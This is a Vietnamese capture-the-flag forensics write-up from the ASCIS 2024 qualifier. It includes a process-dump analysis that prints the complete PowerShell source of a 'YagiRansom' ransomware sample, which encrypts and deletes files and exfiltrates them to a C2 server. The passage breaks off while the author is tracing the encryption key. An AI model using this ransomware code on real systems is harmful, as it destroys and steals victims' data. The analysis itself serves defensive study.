Sinh Viên Với An toàn Thông Tin ASCIS - 2024 (Vòng Sơ Khảo)

# Easy Forensic ![Screenshot 2024-10-08 213726](https://hackmd.io/_uploads/H1w2QpfkJx.png) **Thử thách cung cấp 1 file memory và 1 file nén .rar(có pass)** **Giải pháp:** * Đọc mô tả mà thử thách cung cấp thì liên quan đến kỹ thuật persistence nên mình sẽ check trong 1 số nơi mà attacker hay dùng để đạt được sự kiên trì, sau một hồi check thì biết được flag nằm trong thư mục run ở trong registry: * ![Screenshot 2024-10-08 215140](https://hackmd.io/_uploads/rJYzw6MJkl.png) Có 1 đoạn base64 trong file nằm trong key run => decode base64 lấy được password mở file .rar: `Password is {Fileless-Malware-Persistence}` **Flag:** `ASCIS{Gh4st1n_Th3_R2M}` # Urgent Tina **DESCRIPTION** ``` Our client is a pessimist, she is worried that if she does not pay the ransom in the next 8 hours, the hacker will not give her any more chance to get her data back. We are trying to reassure her because we believe that our talented experts can find the cause and restore her data in less than 8 hours. ``` **Thử thách này cung cấp cho mình 2 file: process dump file và pcap file** **Giải pháp:** * Mình sẽ mở 2 file này lên và check song song luôn : * Với file dump mình sẽ xem một số thông tin: - ![Screenshot 2024-10-10 202717](https://hackmd.io/_uploads/SJWvU8SJkg.png) , ta thấy file này tiến trình được dump ra từ file update.exe và có thể thấy tiến trình của nó đang chạy lệnh : `C:\Users\IEUser\Desktop\update.exe -e C:\Users\IEUser\Documents\ -s 192.168.240.1 -p 443 -x` => Đây chính là con malware dùng để mã hóa và đánh cắp dữ liệu người dùng. * Tiếp theo đến với file pcap: * ![Screenshot 2024-10-10 203242](https://hackmd.io/_uploads/B1wqPUrJJe.png) , ta thấy dữ liệu đang được đẩy qua server attacker với ip 192.168.240.1 và port 443 tương ứng với cái process name ở trên file dump luôn. * Đến đây thì có 2 hướng : một là làm cách nào đó để lấy được file update.exe ra từ file dump còn 2 là phải đi xem resource ở trong file dump này để xem thu thập được manh mối nào liên quan đến con c2 này không * Vì cách 1 mình có thử nhiều cách(thử dùng !writemem trong windbg như không thành) nên mình sẽ chuyển sang làm cách 2 là dùng strings để xem tài nguyên ở trong file dump mà khi malware được chạy:. * Trong quá trình kiểm tra thì mình thấy có những manh mối hữu ích sau: :::spoiler ``` $RansomLogs = Get-Content "$Directory$slash$I26" | Select-String "No files have been encrypted!" ; if (!$RansomLogs) { DetailSequence=1 DetailTotal=1 SequenceNumber=887 UserId=ADMINISTRATOR\WIN-HO5DPB1FVND HostName=PSRunspace-Host HostVersion=0.5.0.29 HostId=35cf15d9-1dc0-4ed2-a642-eb6c2e8ddc1f HostApplication=C:\Users\IEUser\Desktop\update.exe -e C:\Users\IEUser\Documents\ -s 192.168.240.1 -p 443 -x EngineVersion=5.1.19041.1237 RunspaceId=6883aa8e-60bd-4e7e-be0b-b3927fbf6507 PipelineId=1 ScriptName= CommandLine= $RansomLogs = Get-Content "$Directory$slash$I26" | Select-String "No files have been encrypted!" ; if (!$RansomLogs) { CommandInvocation(Get-Content): "Get-Content" ParameterBinding(Get-Content): name="Path"; value="C:\Users\IEUser\Documents\\yaginote.txt" CommandInvocation(Select-String): "Select-String" ParameterBinding(Select-String): name="Pattern"; value="No files have been encrypted!" ParameterBinding(Select-String): name="InputObject"; value="All your files have been encrypted by YagiRansom!!" ParameterBinding(Select-String): name="InputObject"; value="But don't worry, you can still recover them with the recovery key if you pay the ransom in the next 8 hours." ParameterBinding(Select-String): name="InputObject"; value="To get decryption instructions, you must transfer 100000$ to the following account:" ParameterBinding(Select-String): name="InputObject"; value="" ParameterBinding(Select-String): name="InputObject"; value="Account Name: Mat tran To quoc Viet Nam - Ban Cuu Tro Trung uong" ParameterBinding(Select-String): name="InputObject"; value="" ParameterBinding(Select-String): name="InputObject"; value="Account Number: 0011.00.1932418" ParameterBinding(Select-String): name="InputObject"; value="" ParameterBinding(Select-String): name="InputObject"; value="Bank: Vietnam Joint Stock Commercial Bank for Foreign Trade (Vietcombank)" ParameterBinding(Select-String): name="InputObject"; value="" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\13bae5d78b3351adcd58116cc58465ed.png is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\248368233_230702282385338_6224698627922749235_n.jpg is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\ad1639ada044a912032925bdc7f132c8.jpg is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\black.png is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_1.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_10.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_11.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_12.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_13.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_14.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_15.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_16.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_17.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_18.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_19.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_2.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_20.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_21.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_22.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_23.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_24.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_25.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_26.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_27.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_28.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_29.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_3.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_30.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_31.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_32.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_33.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_34.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_35.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_36.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_37.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_38.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_39.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_4.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_40.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_41.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_42.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_43.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_44.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_45.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_46.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_47.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_48.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_49.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_5.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_50.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_51.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_52.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_53.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_54.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_55.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_56.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_57.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_58.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_59.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_6.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_7.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_8.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_9.txt is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\IoT_security_IoTSec_considerations_requirements_and_architectures.pdf is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\jM-z3b7f_400x400.jpg is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\mim.png is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\pexels-sebastiaan-stam-1097456.jpg is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\vietnam.jpg is now encrypted" ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\z3399223868975_f9672eaf281fbf6771659ccb18692a12.jpg is now encrypted" !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~ ADMINISTRATOR foreach ($i in $(Get-ChildItem $Directory -recurse -filter *.enc | Where-Object { ! $_.PSIsContainer } | ForEach-Object { $_.FullName })) { DetailSequence=1 DetailTotal=1 SequenceNumber=889 UserId=ADMINISTRATOR\WIN-HO5DPB1FVND HostName=PSRunspace-Host HostVersion=0.5.0.29 HostId=35cf15d9-1dc0-4ed2-a642-eb6c2e8ddc1f HostApplication=C:\Users\IEUser\Desktop\update.exe -e C:\Users\IEUser\Documents\ -s 192.168.240.1 -p 443 -x EngineVersion=5.1.19041.1237 RunspaceId=6883aa8e-60bd-4e7e-be0b-b3927fbf6507 PipelineId=1 ScriptName= CommandLine= foreach ($i in $(Get-ChildItem $Directory -recurse -filter *.enc | Where-Object { ! $_.PSIsContainer } | ForEach-Object { $_.FullName })) { CommandInvocation(Get-ChildItem): "Get-ChildItem" ParameterBinding(Get-ChildItem): name="Recurse"; value="True" ParameterBinding(Get-ChildItem): name="Filter"; value="*.enc" ParameterBinding(Get-ChildItem): name="Path"; value="C:\Users\IEUser\Documents\" CommandInvocation(Where-Object): "Where-Object" ParameterBinding(Where-Object): name="FilterScript"; value=" ! $_.PSIsContainer " CommandInvocation(ForEach-Object): "ForEach-Object" ParameterBinding(ForEach-Object): name="Process"; value=" $_.FullName " ParameterBinding(Where-Object): name="InputObject"; value="13bae5d78b3351adcd58116cc58465ed.png.enc" ParameterBinding(ForEach-Object): name="InputObject"; value="13bae5d78b3351adcd58116cc58465ed.png.enc" ParameterBinding(Where-Object): name="InputObject"; value="248368233_230702282385338_6224698627922749235_n.jpg.enc" ParameterBinding(ForEach-Object): name="InputObject"; value="248368233_230702282385338_6224698627922749235_n.jpg.enc" ParameterBinding(Where-Object): name="InputObject"; value="ad1639ada044a912032925bdc7f132c8.jpg.enc" ParameterBinding(ForEach-Object): name="InputObject"; value="ad1639ada044a912032925bdc7f132c8.jpg.enc" ``` ::: , Trên là những thông tin về các file trong thư mục Document bị mã hóa: * Tiếp tục check một hồi lâu tìm kiếm thì mình cũng tìm thấy được resource liên quan đến c2 này đó là 1 đoạn powershell: :::spoiler ```powershell # Design $ProgressPreference = "SilentlyContinue" $ErrorActionPreference = "SilentlyContinue" $OSVersion = [Environment]::OSVersion.Platform if ($OSVersion -like "*Win*") { $Host.UI.RawUI.WindowTitle = "YagiRansom" $Host.UI.RawUI.BackgroundColor = "Black" $Host.UI.RawUI.ForegroundColor = "White" } # Variables $Mode = $args[0] $Directory = $args[1] $WiETm = $args[3] $7CiB = $args[3] $UFX = $args[5] $ENyR = $args[6] $DCe = $null # Errors if ($args[0] -like "-h*") { break } if ($args[0] -eq $null) { Write-Host "[!] Not enough/Wrong parameters!" -ForegroundColor Red ; Write-Host ; break } if ($args[1] -eq $null) { Write-Host "[!] Not enough/Wrong parameters!" -ForegroundColor Red ; Write-Host ; break } if ($args[2] -eq $null) { Write-Host "[!] Not enough/Wrong parameters!" -ForegroundColor Red ; Write-Host ; break } if ($args[3] -eq $null) { Write-Host "[!] Not enough/Wrong parameters!" -ForegroundColor Red ; Write-Host ; break } # Proxy Aware [System.Net.WebRequest]::DefaultWebProxy = [System.Net.WebRequest]::GetSystemWebProxy() [System.Net.WebRequest]::DefaultWebProxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials $AllProtocols = [System.Net.SecurityProtocolType]"Ssl3,Tls,Tls11,Tls12" ; [System.Net.ServicePointManager]::SecurityProtocol = $AllProtocols # Functions $OgE = ([Environment]::MachineName).ToLower() ; $zVSza = ([Environment]::UserName).ToLower() ; $I26 = "yaginote.txt" $7VEq = Get-Date -Format "HH:mm - dd/MM/yy" ; $Uz19o = $7VEq.replace(":","").replace(" ","").replace("-","").replace("/","")+$zVSza+$OgE if ($OSVersion -like "*Win*") { $domain = (([Environment]::UserDomainName).ToLower()+"\") ; $slash = "\" } else { $domain = $null ; $slash = "/" } $DirectoryTarget = $Directory.Split($slash)[-1] ; if (!$DirectoryTarget) { $DirectoryTarget = $Directory.Path.Split($slash)[-1] } function Invoke-AESEncryption { [CmdletBinding()] [OutputType([string])] Param( [Parameter(Mandatory = $true)] [String]$Key, [Parameter(Mandatory = $true, ParameterSetName = "CryptText")] [String]$Text, [Parameter(Mandatory = $true, ParameterSetName = "CryptFile")] [String]$Path) Begin { $m95I = New-Object System.Security.Cryptography.SHA256Managed $n9ibn = New-Object System.Security.Cryptography.AesManaged $n9ibn.Mode = [System.Security.Cryptography.CipherMode]::CBC $n9ibn.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7 $n9ibn.BlockSize = 128 $n9ibn.KeySize = 256 } Process { $n9ibn.Key = $m95I.ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Key)) if ($Text) {$plainBytes = [System.Text.Encoding]::UTF8.GetBytes($Text)} if ($Path) { $File = Get-Item -Path $Path -ErrorAction SilentlyContinue if (!$File.FullName) { break } $plainBytes = [System.IO.File]::ReadAllBytes($File.FullName) $outPath = $File.FullName + ".enc" } $encryptor = $n9ibn.CreateEncryptor() $encryptedBytes = $encryptor.TransformFinalBlock($plainBytes, 0, $plainBytes.Length) $encryptedBytes = $n9ibn.IV + $encryptedBytes $n9ibn.Dispose() if ($Text) {return [System.Convert]::ToBase64String($encryptedBytes)} if ($Path) { [System.IO.File]::WriteAllBytes($outPath, $encryptedBytes) (Get-Item $outPath).LastWriteTime = $File.LastWriteTime }} End { $m95I.Dispose() $n9ibn.Dispose()}} function RemoveWallpaper { $code = @" using System; using System.Drawing; using System.Runtime.InteropServices; using Microsoft.Win32; namespace CurrentUser { public class Desktop { [DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)] private static extern int SystemParametersInfo(int uAction, int uParm, string lpvParam, int fuWinIni); [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)] private static extern int SetSysColors(int cElements, int[] lpaElements, int[] lpRgbValues); public const int UpdateIniFile = 0x01; public const int SendWinIniChange = 0x02; public const int SetDesktopBackground = 0x0014; public const int COLOR_DESKTOP = 1; public int[] first = {COLOR_DESKTOP}; public static void RemoveWallPaper(){ SystemParametersInfo( SetDesktopBackground, 0, "", SendWinIniChange | UpdateIniFile ); RegistryKey regkey = Registry.CurrentUser.OpenSubKey("Control Panel\\Desktop", true); regkey.SetValue(@"WallPaper", 0); regkey.Close();} public static void SetBackground(byte r, byte g, byte b){ int[] elements = {COLOR_DESKTOP}; RemoveWallPaper(); System.Drawing.Color color = System.Drawing.Color.FromArgb(r,g,b); int[] colors = { System.Drawing.ColorTranslator.ToWin32(color) }; SetSysColors(elements.Length, elements, colors); RegistryKey key = Registry.CurrentUser.OpenSubKey("Control Panel\\Colors", true); key.SetValue(@"Background", string.Format("{0} {1} {2}", color.R, color.G, color.B)); key.Close();}}} try { Add-Type -TypeDefinition $code -ReferencedAssemblies System.Drawing.dll } finally {[CurrentUser.Desktop]::SetBackground(250, 25, 50)}} function PopUpRansom { [void] [System.Reflection.Assembly]::LoadWithPartialName("System.Drawing") [void] [System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms") [void] [System.Windows.Forms.Application]::EnableVisualStyles() Invoke-WebRequest -useb https://www.mediafire.com/view/wlq9mlfrlonlcuk/yagi.png/file -Outfile $env:temp\YagiRansom.jpg Invoke-WebRequest -useb https://www.mediafire.com/file/s4qcg4hk6bnd2pe/Yagi.ico/file -Outfile $env:temp\YagiRansom.ico $shell = New-Object -ComObject "Shell.Application" $shell.minimizeall() $form = New-Object system.Windows.Forms.Form $form.ControlBox = $false; $form.Size = New-Object System.Drawing.Size(900,600) $form.BackColor = "Black" $form.MaximizeBox = $false $form.StartPosition = "CenterScreen" $form.WindowState = "Normal" $form.Topmost = $true $form.FormBorderStyle = "Fixed3D" $form.Text = "YagiRansom" $formIcon = New-Object system.drawing.icon ("$env:temp\YagiRansom.ico") $form.Icon = $formicon $img = [System.Drawing.Image]::Fromfile("$env:temp\YagiRansom.jpg") $pictureBox = new-object Windows.Forms.PictureBox $pictureBox.Width = 920 $pictureBox.Height = 370 $pictureBox.SizeMode = "StretchImage" $pictureBox.Image = $img $form.controls.add($pictureBox) $label = New-Object System.Windows.Forms.Label $label.ForeColor = "Cyan" $label.Text = "All your files have been encrypted by YagiRansom!" $label.AutoSize = $true $label.Location = New-Object System.Drawing.Size(50,400) $font = New-Object System.Drawing.Font("Consolas",15,[System.Drawing.FontStyle]::Bold) $form.Font = $Font $form.Controls.Add($label) $label1 = New-Object System.Windows.Forms.Label $label1.ForeColor = "White" $label1.Text = "But don t worry, you can still recover them with the recovery key if you pay the ransom in the next 8 hours." $label1.AutoSize = $true $label1.Location = New-Object System.Drawing.Size(50,450) $font1 = New-Object System.Drawing.Font("Consolas",15,[System.Drawing.FontStyle]::Bold) $form.Font = $Font1 $form.Controls.Add($label1) $okbutton = New-Object System.Windows.Forms.Button; $okButton.Location = New-Object System.Drawing.Point(750,500) $okButton.Size = New-Object System.Drawing.Size(110,35) $okbutton.ForeColor = "Black" $okbutton.BackColor = "White" $okbutton.FlatStyle = [System.Windows.Forms.FlatStyle]::Flat $okButton.Text = 'Pay Now!' $okbutton.Visible = $false $okbutton.Enabled = $true $okButton.DialogResult = [System.Windows.Forms.DialogResult]::OK $okButton.add_Click({ [System.Windows.Forms.MessageBox]::Show($this.ActiveForm, 'Your payment order has been successfully registered!', 'YagiRansom Payment Processing System', [Windows.Forms.MessageBoxButtons]::"OK", [Windows.Forms.MessageBoxIcon]::"Warning")}) $form.AcceptButton = $okButton $form.Controls.Add($okButton) $form.Activate() 2>&1> $null $form.Focus() 2>&1> $null $btn=New-Object System.Windows.Forms.Label $btn.Location = New-Object System.Drawing.Point(50,500) $btn.Width = 500 $form.Controls.Add($btn) $btn.ForeColor = "Red" $startTime = [DateTime]::Now $count = 10.6 $7VEqr=New-Object System.Windows.Forms.Timer $7VEqr.add_Tick({$elapsedSeconds = ([DateTime]::Now - $startTime).TotalSeconds ; $remainingSeconds = $count - $elapsedSeconds if ($remainingSeconds -like "-0.1*"){ $7VEqr.Stop() ; $okbutton.Visible = $true ; $btn.Text = "0 Seconds remaining.." } $btn.Text = [String]::Format("{0} Seconds remaining..", [math]::round($remainingSeconds))}) $7VEqr.Start() $btntest = $form.ShowDialog() if ($btntest -like "OK"){ $Global:PayNow = "True" }} function R64Encoder { if ($args[0] -eq "-t") { $VaFQ = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($args[1])) } if ($args[0] -eq "-f") { $VaFQ = [Convert]::ToBase64String([IO.File]::ReadAllBytes($args[1])) } $VaFQ = $VaFQ.Split("=")[0] ; $VaFQ = $VaFQ.Replace("C", "-") ; $VaFQ = $VaFQ.Replace("E", "_") $8bKW = $VaFQ.ToCharArray() ; [array]::Reverse($8bKW) ; $R64Base = -join $8bKW ; return $R64Base } function GetStatus { Try { Invoke-WebRequest -useb "$7CiB`:$UFX/status" -Method GET Write-Host "[i] C2 Server is up!" -ForegroundColor Green } Catch { Write-Host "[!] C2 Server is down!" -ForegroundColor Red }} function SendResults { $cvf = Invoke-AESEncryption -Key $Uz19o -Text $WiETm ; $cVl = R64Encoder -t $cvf $2YngY = "> $cVl > $OgE > $zVSza > $7VEq" $RansomLogs = Get-Content "$Directory$slash$I26" | Select-String "[!]" | Select-String "YagiRansom!" -NotMatch $XoX = R64Encoder -t $2YngY ; $B64Logs = R64Encoder -t $RansomLogs Invoke-WebRequest -useb "$7CiB`:$UFX/data" -Method POST -Body $XoX 2>&1> $null Invoke-WebRequest -useb "$7CiB`:$UFX/logs" -Method POST -Body $B64Logs 2>&1> $null } function SendClose { Invoke-WebRequest -useb "$7CiB`:$UFX/close" -Method GET 2>&1> $null } function SendPay { Invoke-WebRequest -useb "$7CiB`:$UFX/pay" -Method GET 2>&1> $null } function SendOK { Invoke-WebRequest -useb "$7CiB`:$UFX/done" -Method GET 2>&1> $null } function CreateReadme { $I26TXT = "All your files have been encrypted by YagiRansom!!`nBut don't worry, you can still recover them with the recovery key if you pay the ransom in the next 8 hours.`nTo get decryption instructions, you must transfer 100000$ to the following account:`n`nAccount Name: Mat tran To quoc Viet Nam - Ban Cuu Tro Trung uong`n`nAccount Number: 0011.00.1932418`n`nBank: Vietnam Joint Stock Commercial Bank for Foreign Trade (Vietcombank)`n" if (!(Test-Path "$Directory$slash$I26")) { Add-Content -Path "$Directory$slash$I26" -Value $I26TXT }} function EncryptFiles { $ExcludedFiles = '*.enc', 'yaginote.txt', '*.dll', '*.ini', '*.sys', '*.exe', '*.msi', '*.NLS', '*.acm', '*.nls', '*.EXE', '*.dat', '*.efi', '*.mui' foreach ($i in $(Get-ChildItem $Directory -recurse -exclude $ExcludedFiles | Where-Object { ! $_.PSIsContainer } | ForEach-Object { $_.FullName })) { Invoke-AESEncryption -Key $WiETm -Path $i ; Add-Content -Path "$Directory$slash$I26" -Value "[!] $i is now encrypted" ; Remove-Item $i } $RansomLogs = Get-Content "$Directory$slash$I26" | Select-String "[!]" | Select-String "YagiRansom!" -NotMatch ; if (!$RansomLogs) { Add-Content -Path "$Directory$slash$I26" -Value "[!] No files have been encrypted!" }} function ExfiltrateFiles { Invoke-WebRequest -useb "$7CiB`:$UFX/files" -Method GET 2>&1> $null $RansomLogs = Get-Content "$Directory$slash$I26" | Select-String "No files have been encrypted!" ; if (!$RansomLogs) { foreach ($i in $(Get-ChildItem $Directory -recurse -filter *.enc | Where-Object { ! $_.PSIsContainer } | ForEach-Object { $_.FullName })) { $Pfile = $i.split($slash)[-1] ; $B64file = R64Encoder -f $i ; $B64Name = R64Encoder -t $Pfile Invoke-WebRequest -useb "$7CiB`:$UFX/files/$B64Name" -Method POST -Body $B64file 2>&1> $null }} else { $B64Name = R64Encoder -t "none.null" ; Invoke-WebRequest -useb "$7CiB`:$UFX/files/$B64Name" -Method POST -Body $B64file 2>&1> $null }} function CheckFiles { $RFiles = Get-ChildItem $Directory -recurse -filter *.enc ; if ($RFiles) { $RFiles } else { Write-Host "[!] No encrypted files found!" -ForegroundColor Red }} # Main if ($Mode -eq "-d") { Write-Host ; Write-Host "[!] Shutdowning...." -ForegroundColor Red; sleep 1 } else { Write-Host ; Write-Host "[+] Checking communication with C2 Server.." -ForegroundColor Blue $DCe = GetStatus ; sleep 1 $WiETm = -join ( (48..57) + (65..90) + (97..122) | Get-Random -Count 24 | % {[char]$_}) Write-Host "[!] Encrypting ..." -ForegroundColor Red CreateReadme ; EncryptFiles ; if ($DCe) { SendResults ; sleep 1 if ($ENyR -eq "-x") { Write-Host "[i] Exfiltrating ..." -ForegroundColor Green ExfiltrateFiles ; sleep 1 }} if (!$DCe) { Write-Host "[+] Saving logs in yaginote.txt.." -ForegroundColor Blue } else { Write-Host "[+] Sending logs to C2 Server.." -ForegroundColor Blue }} if ($args -like "-demo") { RemoveWallpaper ; PopUpRansom if ($PayNow -eq "True") { SendPay ; SendOK } else { SendClose ; SendOK }} else { SendOK } sleep 1000 ; Write-Host "[i] Done!" -ForegroundColor Green ; Write-Host ``` ::: , Vì đoạn mã này nhìn trong rất là phức tạp nên mình sẽ phân tích nó từng chút một, Lướt sơ qua thì có các function quan trọng trong con c2 này : AESEncryption, R64Encoder, SendResults, EncryptFiles, ExfiltrateFiles,.. * Đầu tiên mình sẽ vào hàm `R64Encoder` check trước: ```powershell function R64Encoder { if ($args[0] -eq "-t") { $VaFQ = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($args[1])) } if ($args[0] -eq "-f") { $VaFQ = [Convert]::ToBase64String([IO.File]::ReadAllBytes($args[1])) } $VaFQ = $VaFQ.Split("=")[0] ; $VaFQ = $VaFQ.Replace("C", "-") ; $VaFQ = $VaFQ.Replace("E", "_") $8bKW = $VaFQ.ToCharArray() ; [array]::Reverse($8bKW) ; $R64Base = -join $8bKW ; return $R64Base } ``` , trước khi thực hiện mã hóa các file trong thư mục `Document` thì dữ liệu của các file sẽ được đi qua hàm này trước: - Nó tiến hành mã hết base64 hết dữ liệu trong file, tiếp theo replace các kí tự như trên sau đó tiến hành đảo ngược dữ liệu và cuối cùng gán cho biến `$R64Base` và return. * Tiếp theo mình sẽ vào hàm `EncryptFiles` xem nó mã hóa file và đẩy đi như nào: ```powershell function EncryptFiles { $ExcludedFiles = '*.enc', 'yaginote.txt', '*.dll', '*.ini', '*.sys', '*.exe', '*.msi', '*.NLS', '*.acm', '*.nls', '*.EXE', '*.dat', '*.efi', '*.mui' foreach ($i in $(Get-ChildItem $Directory -recurse -exclude $ExcludedFiles | Where-Object { ! $_.PSIsContainer } | ForEach-Object { $_.FullName })) { Invoke-AESEncryption -Key $WiETm -Path $i ; Add-Content -Path "$Directory$slash$I26" -Value "[!] $i is now encrypted" ; Remove-Item $i } $RansomLogs = Get-Content "$Directory$slash$I26" | Select-String "[!]" | Select-String "YagiRansom!" -NotMatch ; if (!$RansomLogs) { Add-Content -Path "$Directory$slash$I26" -Value "[!] No files have been encrypted!" }} ``` , thực hiện mã hóa dữ liệu với thuật toán AES với key là biến `$WiETm` và cái giá trị biến cho được gán sẵn nên buộc mình phải truy ngược đến các hàm liên quan mà có thể lấy được giá trị của biến này **Giai đoạn đang thực hiện truy ngược để lấy được key để giải mã dữ liệu** * Tiếp theo Mình sẽ đi từ hàm `SendResults` để thực hiện công việc lấy được giá trị của biến `$WiETm`: ```powershell function SendResults { $cvf = Invoke-AESEncryption -Key $Uz19o -Text $WiETm ; $cVl = R64Encoder -t $cvf $2YngY = "> $cVl > $OgE > $zVSza > $7VEq" #$WiETm = $RansomLogs = Get-Content "$Directory$slash$I26" | Select-String "[!]" | Select-String "YagiRansom!" -NotMatch $XoX = R64Encoder -t $2YngY ; $B64Logs = R64Encoder -t $RansomLogs Invoke-WebRequest -useb "$7CiB`:$UFX/data" -Method POST -Body $XoX 2>&1> $null Invoke-WebRequest -useb "$7CiB`:$UFX/logs" 